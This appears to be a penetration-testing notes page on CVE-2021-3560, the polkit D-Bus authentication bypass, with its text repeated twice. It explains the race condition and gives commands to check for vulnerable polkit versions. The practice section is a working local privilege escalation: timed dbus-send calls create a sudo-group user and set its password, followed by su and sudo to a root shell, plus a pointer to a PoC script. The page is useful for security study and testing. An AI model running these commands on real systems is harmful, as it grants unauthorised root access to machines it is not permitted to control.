D-Bus Authentication Bypass

CVE-2021-3560

Theory

The vulnerability can be boiled down to these steps:

The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.
The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.
Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.
The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.
Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.
Thinking that the root user requested the action, polkit allows the request to go through unchallenged.

In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user. -

See the full vulnerability explain on the official Kevin Backhouse article.

Practice

Many of the most popular Linux distributions didn’t ship the vulnerable version until more recently. You may run Polkit exploit on the following targets:

RHEL 8
Fedora 21 (or later)
Debian testing (“bullseye”)
Ubuntu 20.04
LTS ("Focal Fossa")

Others may also be vulnerables if you find that the installed polkit package is vulnerable. Affected versions are 0.113 (or later) for rhel,centos,fedora and 0.105-26 for Debian/Ubuntu

#Debian/Ubuntu
apt list --installed | grep policykit-1
dpkg -l | grep -i polkit|grep -i "0.105-26"

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit|grep -i '0.11[3-9]'

Additionally, This exploit works only on distributions that have installed accountsservice and gnome-control-center

#Debian/Ubuntu
dpkg -l  | grep -i 'accountsservice'
dpkg -l  | grep -i 'gnome-control-center'

#RHEL/CentOs/Fedora
rpm -qa  | grep -i 'accountsservice'
rpm -qa  | grep -i 'gnome-control-center'

First, send a dbus message to create a new user

# string:pwned: The new user named "pwned".
# string:"Account Desc": The description of the new user.
# int32:1: sudo group
$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwned string:"Account Desc" int32:1 & sleep 0.005s; kill $!

#Check if it worked
$ id pwned
uid=1000(pwned) gid=1000(pwned) groups=1000(pwned),27(sudo)

Second, generate password and set it with a dbus message

# Generate SHA512 password (-6)
openssl passwd -6 password123

#Dbus message
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!

Third, we can login into this new account and spawn a privileged shell

#Switch
user$ su - pwned

#Spawn root shell
pwned$ sudo su root

To automate this processus, we can use this exploit made by Secnigma.

# Add user with creds secnigma:secnigmaftw
./poc.sh

# Add your own user
./poc.sh -u=MyUser -p=MyPassword

Do not run this script in graphical login

Ressource

Last updated 1 year ago

Was this helpful?

Theory

The vulnerability can be boiled down to these steps:

The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.

The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.

Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.

The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.

Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.

Thinking that the root user requested the action, polkit allows the request to go through unchallenged.

See the full vulnerability explain on the official Kevin Backhouse article.

Practice

Many of the most popular Linux distributions didn’t ship the vulnerable version until more recently. You may run Polkit exploit on the following targets:

RHEL 8
Fedora 21 (or later)
Debian testing (“bullseye”)
Ubuntu 20.04
LTS ("Focal Fossa")

Others may also be vulnerables if you find that the installed polkit package is vulnerable. Affected versions are 0.113 (or later) for rhel,centos,fedora and 0.105-26 for Debian/Ubuntu

#Debian/Ubuntu
apt list --installed | grep policykit-1
dpkg -l | grep -i polkit|grep -i "0.105-26"

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit|grep -i '0.11[3-9]'

Additionally, This exploit works only on distributions that have installed accountsservice and gnome-control-center

#Debian/Ubuntu
dpkg -l  | grep -i 'accountsservice'
dpkg -l  | grep -i 'gnome-control-center'

#RHEL/CentOs/Fedora
rpm -qa  | grep -i 'accountsservice'
rpm -qa  | grep -i 'gnome-control-center'

First, send a dbus message to create a new user

# string:pwned: The new user named "pwned".
# string:"Account Desc": The description of the new user.
# int32:1: sudo group
$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwned string:"Account Desc" int32:1 & sleep 0.005s; kill $!

#Check if it worked
$ id pwned
uid=1000(pwned) gid=1000(pwned) groups=1000(pwned),27(sudo)

Second, generate password and set it with a dbus message

# Generate SHA512 password (-6)
openssl passwd -6 password123

#Dbus message
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!

Third, we can login into this new account and spawn a privileged shell

#Switch
user$ su - pwned

#Spawn root shell
pwned$ sudo su root

To automate this processus, we can use this exploit made by Secnigma.

# Add user with creds secnigma:secnigmaftw
./poc.sh

# Add your own user
./poc.sh -u=MyUser -p=MyPassword

Do not run this script in graphical login